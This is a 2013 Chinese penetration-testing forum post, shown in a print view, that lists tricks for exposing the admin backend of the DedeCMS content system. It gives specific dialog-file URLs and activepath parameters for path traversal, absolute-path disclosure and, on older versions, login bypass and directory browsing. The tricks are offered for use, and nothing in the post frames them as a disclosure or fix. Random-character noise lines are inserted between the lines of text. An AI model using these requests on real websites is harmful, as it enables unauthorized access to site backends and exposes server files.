中国网络渗透测试联盟
标题:
dedecms爆后台文件技巧
[打印本页]
作者:
admin
时间:
2013-4-16 16:50
标题:
dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
! V8 c. s. Y: a% E7 ?% o
5 z+ B, ~ h+ j3 Y
员帐号,新版本的就直接转向了后台.
. C l; E/ d( @! ~
/ A% K0 l/ r4 H+ ]% |+ w
2.include/dialog/config.php会爆出后台管理路径
( i0 T& H# X% |3 E X4 t* ^7 A
/ F1 n# U, P, Q: P
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
2 Q. _1 D# |; {5 Q" ?# U
1 A2 Z p- p+ O& H- Q
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
V% `" w- L- f1 r
1 T/ ^/ B& ]* F) ^/ ]
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
# R: |/ K( _8 j% e# Z. S! b4 O
8 D3 [9 k8 Z- r- z4 Z5 P9 b
到根目录去.不过这些版本的访问地址有些不同.
3 \. N {$ v* B) t; {& m: S8 F% Q
地址为require/dialog/select_soft.php?activepath=/././././././././
! [: u4 W4 Y9 L5 x
* p/ h& a) O: t- h0 c, }9 Y
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
; w/ K$ w, |+ ~' V
存在相同问题的文件还有
# f. F7 t# H; y$ d' ^8 W
include\dialog\select_images.php
( o4 R* g# H& W" E/ O" R1 C
include\dialog\select_media.php
% {- {& l2 J1 {+ D# e
include\dialog\select_templets.php
% X8 l! |" S7 P. R& |& P
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2